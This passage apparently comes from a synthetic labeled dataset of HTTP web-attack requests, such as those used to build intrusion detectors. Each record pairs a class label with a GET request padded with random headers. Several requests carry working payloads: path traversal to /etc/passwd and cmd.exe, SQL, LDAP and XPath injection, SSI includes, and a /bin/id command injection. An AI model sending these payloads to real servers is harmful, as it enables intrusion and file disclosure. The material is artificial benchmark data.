TE: trailers,chunked
Trailer: If-Modified-Since
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 2.0; et-o3; rv:2.8.5) Gecko/60402777
UA-CPU: StrongARM
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3289x1691
Via: HTTP/4.1 193.19.103.148, hesB8e/5.7 46.113.215.20
Transfer-Encoding: identity
Upgrade: itaut/3.7, drtrlo/0.9
Warning: 202 172.75.239.75:0 "5HknetoSUn9esaen" 

uLksau4esbna=tn catr9 xHz&mdl1fidmd=439&o4tiraNt0o=mzLcvv&eeggirsRieodciD=980004080&shenrhrva0ar=octadminn2iinserta&b6eegsbrasESn='; insert  into     roo values(666,'uasnen7h','wA',0xfffff)

End - Id: 41539
Start - Id: 45535
class: PathTransversal
GET /sf/bmZsY/MuO6EtTwhereAusrdropA.asp?eo=Ire&Nluznyfuw=ezae&aenua=0&Gz9Y3=9ZUf7B%40LKEI&bt=e.-k&treeateslaraBs=680611&eeDnzetro=%5Dserhttpsa%5D%25uihr%3A2D+A&ued20wHil7r=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat HTTP/1.0
Host: 62.23.70.23
Connection: close
Accept: */*
Accept-Charset: x-mac-icelandic;q=0.1, iso-8859-9;q=0.3, iso-8859-15;q=0.2
Accept-Encoding: deflate, gzip, compress, deflate;q=0.9, gzip
Accept-Language: *;q=0.9
Cache-Control: max-stale=5673
Client-ip: 66.66.212.231
Cookie: nbHn=wqe;YYzyuou_tPpf=cwbuse;Rk2deletestyleE0c7Jkf= leg
Cookie2: $Version="20"
Date: Tue, 15 May 07 12:44:00 CET
ETag: "Ze@vy62aYSghPKIo"
Expect: ax8lncn
From: muibee@Egtuem.uk
If-Modified-Since: Tue, 07 Jun 05 24:24:10 UTC
If-Unmodified-Since: Sat, 22 Jan 05 05:09:12 GMT
If-Match: "IC-UjTh@w4IWc0m"
If-None-Match: "vWoOO@C-PaR2Ea0G.5A"
If-Range: "NobdZfNtglYhDQNP"
Max-Forwards: 989
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: enba eOsywabt=bulrtl
Authorization: Basic ZW5wSDp0c2hh
Range: 903-3,3-4324,-8
Referer: http://4dReoe.biz/lvtw/euee/nwk3n.pl
TE: trailers
Trailer: Accept
User-Agent: Mozilla/7.4 (Machintosh; U; Mac OS X 6.2; ay-we; rv:8.4.5) Gecko/47040468
UA-CPU: 68000
UA-Disp: 6548,353,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 589x0586
Via: 3.6 187.66.182.212
Transfer-Encoding: identity
Upgrade: vleih/1.8, zzq/8.8, etwstn/4.5, eseo/9.8, ilezr/6.6
Warning: 706 www.0ndytwes.html:36947 "eAwteosqooe7" 
X-Forwarded-For: 167.86.117.234
X-Serial-Number: 2215888867609
----: ------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45535
Start - Id: 35392
class: SqlInjection
GET /Knd/nCT/2DoSt5WskP/cILW7dkexDf6uD/nl./3eoyjCqu/l4iosZn/6Eechw.jpg?ooreetyeawgQ=102&lss=97274&sock_stream57dxHhP5=eIwh+Nf-Rqur6jf2Fx&sZuxmlQih=gps&9nachme4e=ehee&XruIwdmxmlN=%3A&cnqoSEmSesrdt=%5Bannrni&llt=0rhmEbdbin&CX9TFY=%27+++%2B+%28+++++SELECT+++++TOP+++1++epte+++FROM++1hona5%29++%2B+++++%27&2neorbhgpe8eert=ao0w6Gdnset&maeaatgyn=3%40LX0JHxYW HTTP/1.1
Host: www.4alrc.org
Connection: aeSsdmei
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: W99o='gBh'
Client-ip: 42.209.93.236
Cookie: ati5steu=xtermmnir;ploEs=08516422;eo=71
Cookie2: $Version="20"
Date: Fri, 14 Jan 05 23:48:03 GMT
ETag: W/"1zpGD6YngN8ikJCz7Uio"
Expect: yht7tT=oeioef;eadai=ex2nIas
From: 0boosr3e@ftEeuLd2wt.it
If-Modified-Since: Fri, 28 Jul 06 20:55:38 UTC
If-Unmodified-Since: Thu, 04 Dec 08 24:23:41 GMT
If-Match: "fRJc2.6RTWccVquj"
If-None-Match: "ohWC_3App6WkEvSDwF"
If-Range: "5LkSCrlPbaT_H-Ke@"
Max-Forwards: 4
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWlEb1RhQXNodXNobmt0cmVlNnMxbnVoc0ljb2xsaWdjZW1z
Authorization: NTLM ZHVhZWkxZUFlTHRsbnBjUmJEdGRkYm5lUnI0bUNseWw4anM=
Range: 24492-281270
Referer: http://www.vteriss.com/z6te/y2enln/ht743t/ltw8nset.asmx
TE: trailers,gzip
Trailer: Accept-Charset
User-Agent: Mozilla/8.8 (Windows; U; Win 9x 0.8; 1o-yi; rv:4.0.5) Gecko/70214741
UA-CPU: Sparc
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 177x860
Via: FTP/2.4 88.175.11.153:85, 3.7 84.58.189.38
Transfer-Encoding: identity
Warning: 933 134.218.228.163:17 "vrrEhe411r" 
X-Forwarded-For: 31.250.119.48
X-Serial-Number: 840148
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35392
Start - Id: 37952
class: LdapInjection
GET /i6acveosyt4qr/r9N5stnghsy4fsogaadi/alhiephhaht/ijySkBBtgkr.kaWdZ/nullkLlusrqwXbinC/lydssoaEuc/rg3mRrpG6IMjWmjo.B.swf?inUq=fesrre6i1se&tdxrnrsss=huztekri&csAkaiUl=fnvise&bSwarttatrd=%29%28+%7C+%28+cn%3D*o++++%27brien*+%29%28mail%3D*o++%27brien*++++%29++++ HTTP/1.0
Host: 137.211.156.217:558
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic;q=0.8, iso-8859-9, windows-874;q=0.6
Accept-Encoding: *
Accept-Language: thoawRhu-ulwons8e;q=0.4, d5xhae-zdwLnsei;q=0.0, 3r2etaba-e;q=0.6, uh-oteh
Cache-Control: only-if-cached
Client-ip: 106.160.89.209
Cookie: 9a=nuyxterma;dxc0ptmrIii=selectw7iichilduH;cmdC3vE=034842959;4sar=73;el=93
Cookie2: $Version="2"
Date: Sun, 24 Jun 07 21:28:44 UTC
ETag: "OGfjiId4vLFj8EUFd1BJ"
Expect: psersns=esanan
From: nteal@6riIt.fr
If-Modified-Since: Wed, 28 Dec 05 07:26:40 UTC
If-Unmodified-Since: Tue, 30 Dec 08 20:19:26 UTC
If-Match: *
If-None-Match: "d4FnF1Tgb6vM4fuf@MX"
If-Range: Sun, 05 Apr 09 15:21:29 CET
Max-Forwards: 435
MIME-Version: 0.1
Pragma: c=hdsht
Proxy-Authorization: NTLM aXJoenJoN2NpbmdpZnJoY0t0bHNkZW9pc3lkaGI2ZGQ=
Authorization: Basic ODBkcm86dGxzaA==
Range: 03-,-49
Referer: /ep57woa/2lfsr7/sssmii/xtotct.asp
TE: deflate;q=0.1
Trailer: If-Range
User-Agent: Mozilla/1.9 (X11; U; Unix 5.7; sa-ul; rv:7.6.3) Gecko/72423551
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8848x2681
Via: 3.4 227.238.161.80:3, 8.1 2.242.230.209
Transfer-Encoding: compress
Upgrade: spoM3/2.4, sus/6.4, cez/4.2
Warning: 209 www.aRtos.png "mgfiafudiih" 
X-Forwarded-For: 82.192.128.217
X-Serial-Number: 8812591
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37952
Start - Id: 36312
class: PathTransversal
GET /n4yRdIz0Z2V2u2EOhB/MYmVUtF/byC6/cGzr/8jYsvJee/neo8aDkhIoihi/ibDOrjSpJI4PDKUINaG4/NJiZgwAw/iZLMThjX41QGEyX/hr/z5Txloga/sRhavingwservicesMOOu5y.jpeg?l5eIge=%2F%2C%2C%2C%2Fzshe%2FrvHt%2Fpasswd&iNira5eb=aheDe9%3EprueME HTTP/1.1
Host: 107.94.190.21
Connection: peOnlho
Accept: */*;q=0.8
Accept-Charset: windows-1252, euc-cn;q=0.6, x-mac-roman;q=0.6, x-mac-arabic, koi8-r;q=0.3
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 204.44.253.203
Cookie: etaAsstzE=ltwinntame;5ts0enTts=149831731;n5ooopO6ahs=2416;noe=oprocessing-instructiontwamochaaeK|oc/x;rht=hjeoemev
Cookie2: $Version="628"
Date: Thu, 29 Nov 07 05:10:05 GMT
ETag: "PR@C.gH8sSbya5og"
Expect: 100-continue
From: 5ygo@eiccrasaq.org
If-Modified-Since: Sat, 01 Oct 05 08:05:27 GMT
If-Unmodified-Since: Sun, 20 Aug 06 14:21:54 CET
If-Match: "Ftkxf1q3c9V.rL-7"
If-None-Match: *
If-Range: Sun, 21 Feb 10 20:02:53 UTC
Max-Forwards: 4677
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: tioya ejsnoe=rrNti
Authorization: evam nee2qcse=getlnisr
Range: -3
Referer: http://wzlnl.it/odte/neys.tiff
TE: chunked,deflate;q=0.4
Trailer: User-Agent
User-Agent: Mozilla/7.3 (compatible; myts8; Win98; Cadjaeina)
UA-CPU: MIPS
UA-Disp: 617,065,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 645x5981
Via: HTTP/1.1 www.e1drw.html, HTTP/7.3 www.eCibnlE.jpeg, 8.3 www.lt9o.html:5
Transfer-Encoding: identity
Upgrade: saanei/2.6
Warning: 925 www.seESe.gif "aoh3bha8hrc" 
X-Forwarded-For: 87.172.119.89
X-Serial-Number: 10989646571343616
----: -------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36312
Start - Id: 39229
class: SSI
GET /tgyrmj3z5-L0ZetHWcL/yr5tu0/fxWe8aXhDTo-1U10O0V/t.Z.1b0qIqTr8McE/t1tdteehtpitnHan/mnc/dw/mpf@@jl2vpmb@oVipGN.pl?Ag=%3C%21--%23email+fromhost%3D%22www.tyulin.com%22+tohost%3D%22mailbox.inB0.com%22+message%3D%22hewtt+ntEhStf+2oOe+oNwaea%22+fromaddress%3D%22mlmK.com%22+toaddress%3D%22ota.rsrrhr.com%22+subject%3D%22tt%22+sender%3D%22ee1.com%22+replyto%3D%22teeqtM.com%22+cc%3D%22Win%22+inreplyto%3D%22tael+1rms+cetq%22+id%3D%22wEnmcmail%22+--%3E&tt1finuasRfeer9=a&EkmmigSaruburdl=6&fssdytnbtic=tats7igqrrdb+t1h6%27&JeutsrhgSnatri=sao7ar+php HTTP/1.1
Host: www.nhs4c.biz
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: deflate
Accept-Language: ZooCh3BU-eeeiem4, sh-ottahb
Cache-Control: only-if-cached
Client-ip: 98.18.205.234
Cookie: cnta=m;sek=shIoa;tsNo=696943365;twttmtee5=oHe;1h7n=a~q
Cookie2: $Version="798"
Date: Thu, 25 May 06 15:18:23 GMT
ETag: W/"SEciDHf1YaSpWifciL1"
Expect: 100-continue
From: en6rC0@ulle.be
If-Modified-Since: Tue, 16 Jun 09 12:55:58 UTC
If-Unmodified-Since: Sun, 19 Feb 06 14:09:42 UTC
If-Match: *
If-None-Match: "1ntjWUkbzQ2NkLSMt"
If-Range: "a93NOitfDw-biTWhFn"
Max-Forwards: 083
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: ti6m Oeyaeh=euifee
Range: 5-9725,-6683
Referer: http://fnbgq2lc.uk/po8aed/gru7nlan.cfm
TE: trailers,gzip;q=0.2,deflate;q=0.3
Trailer: Pragma
User-Agent: hrndcyiu (nyv9Cb; hvzPoWgi; e9OyN5yF; hef3n6Q; ymEv3hGK)
UA-CPU: 68000
UA-Disp: 274,6270,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 506x400
Via: HTTP/7.4 167.72.115.253
Transfer-Encoding: identity
Upgrade: sjrtoN/2.4, ytwq/5.4, RmLke/9.3, citRri/1.2
Warning: 055 www.xtacnaa.shtml "uuamichbin" 
X-Forwarded-For: 252.9.253.184
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39229
Start - Id: 46333
class: PathTransversal
GET /ocjscaa.tiff?ognye=%2F%2C%2C%2C%2FRh63hai%2Fawgoct%2Fpasswd&6t4nnaozpqh=yAd&4iRcAzoYdOtn=91 HTTP/1.0
Host: 70.197.141.139
Connection: close
Accept: video/*;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: compress, identity;q=0.1, gzip;q=0.3
Accept-Language: T-lnfi, wWtitme-ceenht;q=0.3, azr-gR
Cache-Control: no-cache
Client-ip: 142.8.138.99
Cookie: Rs=6ejjatuzlocationoexe1$;acAthva=77433;Y5mform=rLthti9U
Cookie2: $Version="16"
Date: Tue, 06 Mar 07 12:57:44 CET
ETag: "sMENIf_6Ej0sdIM"
Expect: 100-continue
From: 5alenh@genhnf8.org
If-Modified-Since: Sat, 30 Apr 05 17:27:34 GMT
If-Unmodified-Since: Tue, 24 Feb 09 14:54:38 GMT
If-Match: *
If-None-Match: *
If-Range: "vik.dT13hr@dUPyPUUF"
Max-Forwards: 684
MIME-Version: 3.4
Pragma: Ue=uyd3P
Proxy-Authorization: Digest nc=54AeEe7f
Authorization: NTLM aW9ybHJlMnI3aG9lZWh0c2NpOWFtZXJzYW5yS25waXJw
Range: 11-897,103770-88,-588131
Referer: /patI/wjzeU/tfoeqxU.wav
TE: deflate;q=0.4
Trailer: Max-Forwards
User-Agent: rErotz (hOT7GQI; tX12GQDlj; 46OTsc-Wb; mp8se4Iy; t-kESR)
UA-CPU: PowerPC
UA-Disp: 0890,6289,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 598x8169
Via: FTP/6.3 154.147.197.111:0, FTP/6.2 21.191.231.200
Transfer-Encoding: identity
Upgrade: Dnh/3.3, iienNa/1.0, khpjt/2.7, ote6v4/0.0
Warning: 494 178.239.117.244 "Abhgtrgfsota" "Tue, 21 Mar 06 06:42:46 CET"
X-Forwarded-For: 252.174.195.68
X-Serial-Number: 5744439401
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46333
Start - Id: 49361
class: XPathInjection
GET /ftrteubl4ltrde4kyte6/niz/hisple4/Auh4/tmpAN2EXP/UjU1iA/4ftHl7ymbWTU1wZ/thwens4rQoh/ef/ebtiTametoussF/u8wdt/Yinput.asmx?eulRe5duiwEr2N=aDt%25it%7Ciss&gnaaihahrt0io=itaazjRh%27+++or+++++%28i++%3C++++count%28quseoI%2Fchild%3A%3Atext%28%29%29+++and++++j+%3C+++count%28vn%2Fchild%3A%3Acomment%28%29%29+and+++k++++%3C+++count%282e%2Fchild%3A%3A*%29+++%29++++or+++%27Sle6ybn%27+%3D%27+ige%27++++or&awEa=esxi++httpshvhcowindow.openruai&pl=00229754&vhrhsnbcnnt0=rd&o6P2b=+i%3Ctetmpd&uBVreplace6kliframeA=oavarntmpt&yrefahh7eus=dblfYnee&nmszui5eRunker=eXdrX9&tah6nmIs=307&repya=84730 HTTP/1.1
Host: 224.217.81.100:80
Connection: close
Accept: video/*;q=0.6, audio/x-wav;q=0.6
Accept-Charset: x-mac-chinesesimp, hz-gb-2312;q=0.0, windows-1252
Accept-Encoding: 
Accept-Language: hx-mxe
Cache-Control: max-stale
Client-ip: 30.6.154.223
Cookie: eAr=3;hbath9sgr5soe=hqt1@-tSuyCH
Cookie2: $Version="771"
Date: Sat, 07 Apr 07 21:03:59 GMT
ETag: W/"e7ALYWdkwT_kw1lOFgF"
Expect: 100-continue
From: EgerC@tafwi.com
If-Modified-Since: Wed, 12 Aug 09 02:28:53 CET
If-Unmodified-Since: Wed, 15 Jul 09 16:29:32 CET
If-Match: *
If-None-Match: "5.m4rxB5kaygeDde_"
If-Range: Sun, 08 May 05 08:07:48 UTC
Max-Forwards: 059
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest uri=http://efar.be/thtuh/euhhew3a/theOa.conf
Authorization: gEen je4f=me70Ymri
Range: 896-
Referer: http://2i7odu.biz/ic5ftes/thubh/ncdAO.js
TE: gzip;q=0.7
Trailer: Pragma
User-Agent: Mozilla/2.9 (X11; U; Linux i586 7.0; hj-a4; rv:8.9.4) Gecko/99678818
UA-CPU: StrongARM
UA-Disp: 646,996,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 396x142
Via: FTP/5.5 www.uwoudy.htm:009, aa4/3.4 198.238.9.212:4, 8.7 11.229.65.94
Transfer-Encoding: gzip
Upgrade: eens/3.9, nsloG/2.4, fad/4.2, efvt/2.8
Warning: 652 www.nylcr.tiff "iphresmanuhdbtxo" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49361
Start - Id: 43512
class: OsCommanding
GET /hiA.jsp?bloj0ocfc6lscTq=402&zGGyGxh=%5C%3B+++++%5C%2Fbin%5C%2Fid+++%3B&nehsdnsu=eter&tbeenTHMTtsz=c2eumoedB&aeeeacscncaatI=infasr HTTP/1.1
Host: 40.51.55.224
Connection: keep-alive
Accept: audio/x-wav;q=0.5
Accept-Charset: x-mac-arabic
Accept-Encoding: 
Accept-Language: eu-1ehlVp73;q=0.2, hl-aIisgjie;q=0.3, 3t5tr-btmll7, 4aN-s7heh;q=0.4
Cache-Control: min-fresh=0647
Client-ip: 108.184.195.217
Cookie: O2Kbodylwinnt-J5SA=2affa;l1ano=781;rn9undree0=0970613;Es=urmxstIecxNew;esret9=he=/;6a=nhn
Cookie2: $Version="916"
Date: Fri, 02 Sep 05 24:17:17 UTC
ETag: "PxnNJB_jtB5FqDUJ"
Expect: 100-continue
From: rb2eklg@erhan.net
If-Modified-Since: Tue, 20 Nov 07 10:37:09 CET
If-Unmodified-Since: Fri, 09 Nov 07 01:27:22 UTC
If-Match: *
If-None-Match: "P-yUhU_dJIveflm"
If-Range: Mon, 10 Dec 07 23:18:19 CET
Max-Forwards: 7
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic bFJvZ25nOmVmVGNx
Authorization: Basic ZWJ1end0Ojh0SGF0Uw==
Range: 32-61,4386-85
Referer: /ysbs4cda.php3
TE: trailers,deflate;q=0.5,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/0.3 (compatible; tewnbrEu; Solaris; sha3txenb)
UA-CPU: MIPS
UA-Disp: 034,8508,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5281x2497
Via: 7.6 84.74.1.199
Transfer-Encoding: compress
Upgrade: tlle/3.2, ouiu/2.7, 6nb/4.0, iuoaC/4.5, ioatma/4.1
Warning: 156 193.81.211.74 "9aeu3wesnnaer" 
X-Forwarded-For: 134.201.54.76
X-Serial-Number: 521013041943
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43512
Start - Id: 35948
class: PathTransversal
GET /Eodu2t8s79wJy/rknemuHenyxddl2u4hn/9aao3.cfm?rLhai5eiribeSr=37427&ocihnotoeosa=26804363&ttdcoha6so2dne=%3C%21--+++%23include+virtual%3D%22%2Fetc%2Fpasswd%22+++--%3E&aeieeblomkdsSeh=3urelasodn9d&nitcghhvbcsl=%2FAwjneSmoe HTTP/1.0
Host: www.nd6r6clc.net
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=980
Client-ip: 51.18.212.153
Cookie: imdfaoebM0myrmo=eKwISHXp;aS=wpu3tE;dnee3eicntbRsl6= logUut;eZvDVZvClI==e&d systemn6tlensaccess_logtelnet;Lnas=4
Cookie2: $Version="31"
Date: Mon, 22 Mar 04 07:21:41 GMT
ETag: W/"I1k9LjH86E57ta@Yak-E"
Expect: 100-continue
From: VhEec8@alpudeo.biz
If-Modified-Since: Mon, 12 Jan 04 23:55:38 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3316
Pragma: no-cache
Referer: /ulae/bhtha.pdf
TE: gzip;q=0.7
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.1 (Windows; U; Windows NT 4.7; Ot-ai; rv:7.7.5) Gecko/20527497
UA-Pixels: 612x0492
Via: 6.0 www.lreld.tiff, HTTP/2.4 199.48.62.246, FTP/5.1 206.52.31.118
Transfer-Encoding: compress
Upgrade: rNetn/9.6, Otc/8.0, fekc/6.8, trlls/0.1
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35948
Start - Id: 49773
class: XPathInjection
GET /BU92Gnodew_locationp3A2/nps/eqbna9K/u1m6pearlye/aZeRX9B.html?nssenMoecuf9=u&eioehslT5=sRte6%2Fhp%2FURp%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D58%5D+++or++%27cysien%27++%3D++%27&r_aX4=igf&rs0rlxfitceoUs=nlri&cd=0247962711 HTTP/1.1
Host: www.bmttHt.de
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 253.1.218.202
Cookie: fGkt=gAecTa3i6rinzCsee;e9ncndttswauw8c=fromtup\ ;odoiti=opentseae0Tctsoljr4lt
Cookie2: $Version="2"
Date: Mon, 02 Feb 04 11:40:22 GMT
ETag: W/"KnKCfoDimSyNjwBe9@oK"
Expect: 100-continue
From: oeeybh7n@salnzlo.de
If-Modified-Since: Thu, 19 Mar 09 04:49:38 CET
If-Unmodified-Since: Fri, 09 Mar 07 20:57:30 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: oehb ranln=fcmedrne
Range: 14795-998802,-1811,-6511
Referer: /TSsap/flChnp/reorsr/oacck/s9te.dll
TE: trailers,deflate,trailers
Trailer: Connection
User-Agent: emdeeh9sur
UA-CPU: Sparc
UA-Disp: 7451,3171,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3095x7377
Via: 4.7 www.9ape.gif
Transfer-Encoding: iamw
Upgrade: nsdxSt/6.8, syIacs/5.6
Warning: 313 www.rnatjdd.tiff "ikOaheaoton2wee" "Wed, 13 May 09 04:48:39 UTC"
X-Forwarded-For: 242.32.16.78
X-Serial-Number: 9273829516846529
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49773
Start - Id: 37903
class: LdapInjection
GET /smcCv-aYk0G-3BxAdB8/zvLGnXkR-Uw/._pJTLjO4LtelnetwkEs/3kPT/eATsrelr/ibg4/mzekZHq_328fF/essiieqeaeel2o/0tBOzTp40WQcE.M7D/tfXpsGlng2cK.aspx?6gVf6Q=1804%29%28%26%28objectClass%3Dsd0q%29%28%7C%28sn++%3D++aoe%29%28cn%3Dse+++J*%29%29&h33iae3lab=vosi9nnn3to&FK@gZsam7@29e=A8xh&nY2naWdyaner=aaofytneye9&9hsoecaE7do=pstqwootrl+bodydoaccess_log%5Datieval&slnit6shmvj8=39&hmu1dur=866&-0M._iframe_IBm=tyrenxureoue3 HTTP/1.0
Host: 78.226.94.18:602
Connection: keep-alive
Accept: application/x-tar
Accept-Charset: iso-2022-jp;q=0.1, iso-8859-2, iso-8859-15, big5;q=0.2, x-mac-chinesesimp;q=0.8
Accept-Encoding: 
Accept-Language: ssvNl-0dHa;q=0.6, i-qaotnpa, et-dtee, ydls-nd4the, bait-ipew
Cache-Control: max-age=36386
Client-ip: 81.10.236.236
Cookie: eeitcyn7=eXiH
Cookie2: $Version="1"
Date: Mon, 24 May 04 16:22:16 UTC
ETag: W/"k_eK26HPsis_XTtOs"
Expect: rtuj9fsi=tnild
From: pyeere9e@rgid7rnosp.be
If-Modified-Since: Fri, 04 Feb 05 05:47:15 CET
If-Unmodified-Since: Mon, 25 Sep 06 11:39:32 GMT
If-Match: *
If-None-Match: "KPyQYS3ZDOJzjYnPKR"
If-Range: "RMgMI-CTfjQkK3iPH"
Max-Forwards: 0
MIME-Version: 1.5
Pragma: hthneo='r'
Proxy-Authorization: Digest realm
Authorization: viol wsolm=aeyhuO
Range: -004662,03-,-2001
Referer: http://www.ub6ee.st/4ideH/erotnc/EsncpNw3/yaGa1itn/eeoutuvc.mpg
TE: gzip
Trailer: User-Agent
User-Agent: s2hts/3.1.7.0.6
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 649x451
Via: 3.6 84.243.131.206:04
Transfer-Encoding: compress
Upgrade: 1tena/5.3
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 146.237.137.95
X-Serial-Number: 17792276895005878262
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37903
Start - Id: 35642
class: XPathInjection
GET /hjS3-9jfb/acRhnEolnc57lbm.tiff?AeqrqnIara=ihoe90bsfwbnnhd&loLspooEej=vemecn%27%5D++%7C++P+%7C+%2F%2Fuser%5B++++name%2Ftext%28%29+++%3D++++%27thtr&itnlda5Zetcye=%25u%3Fcutn&htpieaomhnLa=pKIMc2ZMCZ&hennWea2a=andlt+s9gtEtsr0&qpeqlct=arcpmpnac&eeu62rnes=773&orNltrO=s6cyw&oshc6aapzZ=tsbHZvN%403 HTTP/1.0
Host: www.iet8djc.net:80
Connection: SnwtW
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 69.177.219.175
Cookie: 2eaW9twdsnAhis=3c_kF8zyWBW;9etnt1a=tmTichOj6 yt>3in ;wnn08xnvumnfH=56760895;ev5Esbhg1tNeh=00;shvoHibnf=eahzgkabNr6ebifohe
Cookie2: $Version="5"
Date: Sat, 06 Mar 04 23:10:45 GMT
ETag: W/"Dmc0He.QKJrzUADJY@sw"
Expect: 100-continue
From: esirPUo@ltaa.cz
If-Modified-Since: Mon, 12 Sep 05 21:13:01 CET
If-Unmodified-Since: Mon, 18 Jul 05 14:48:11 CET
If-Match: *
If-None-Match: "jyXh9uV8U_znHt9idY"
If-Range: "zkWc-tc057oKfpcTNgq"
Max-Forwards: 2143
MIME-Version: 7.0
Pragma: h='onEeEth'
Proxy-Authorization: Digest opaque="snOLwi"
Authorization: Digest username="Uharo1"
Range: -38,162-85,-031
Referer: http://www.gR6tue8i.uk/ck1sb2et.mdb
TE: gzip,gzip,gzip;q=0.3
Trailer: Range
User-Agent: Mozilla/9.9 (Machintosh; U; Mac OS X 8.0; ie-tg; rv:6.2.5) Gecko/93398273
UA-CPU: StrongARM
UA-Disp: 458,730,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3327x2128
Via: tete3/5.1 81.40.254.3, 3.0 217.130.122.170:6687
Transfer-Encoding: identity
Upgrade: e1e/4.3, eSaj/4.1, rweui/7.2
Warning: 083 51.53.107.61:3990 "ittpbttTz" "Fri, 23 May 08 24:15:13 GMT"
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 587545
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35642
Start - Id: 44294
class: OsCommanding
GET /scripts/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 72.213.27.213
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: isiri-3342;q=0.1, windows-1252
Accept-Encoding: identity, compress;q=0.4
Accept-Language: *
Cache-Control: no-store
Client-ip: 171.2.10.60
Cookie: uiao=v:t;b9adtisiucnhSda=NtllargineEaha;ifbt=vr665oenrtneoYmt;eameb0ende=autoexecall;qvaPij=s o5a
Cookie2: $Version="583"
Date: Wed, 07 Jul 04 05:33:22 CET
ETag: "b_1HVy3bbCtIipID7"
Expect: 100-continue
From: nfuh7eb@yeoee.gov
If-Modified-Since: Mon, 26 Jul 04 09:17:10 CET
If-Unmodified-Since: Sun, 27 Sep 09 07:31:09 GMT
If-Match: *
If-None-Match: *
If-Range: "PnObIr1--fPNEcLS0iL"
Max-Forwards: 884
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: NTLM b1dmc2ZsdHh6cmV0d2F0dDlsYmlkYWhpc2lrcW5kYWFlOHJ1Zw==
Authorization: wnaeh oheL=ooeioN
Range: 77-00,194-
Referer: /hNnA/oseatiic/8Oiendml/Eer7eweh/sawzItgk.bin
TE: chunked,chunked,gzip;q=0.6
Trailer: If-Match
User-Agent: Mozilla/5.0 (X11; U; Open BSD i586 0.4; AE-ab; rv:2.1.3) Gecko/26316040
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6071x5916
Via: Tei8/8.8 205.87.46.2
Transfer-Encoding: gzip
Upgrade: Aers/1.0, riij1i/9.6
Warning: 525 251.120.159.217 "ay2yetttoyyhQsouLs" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 11968
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44294
Start - Id: 37956
class: LdapInjection
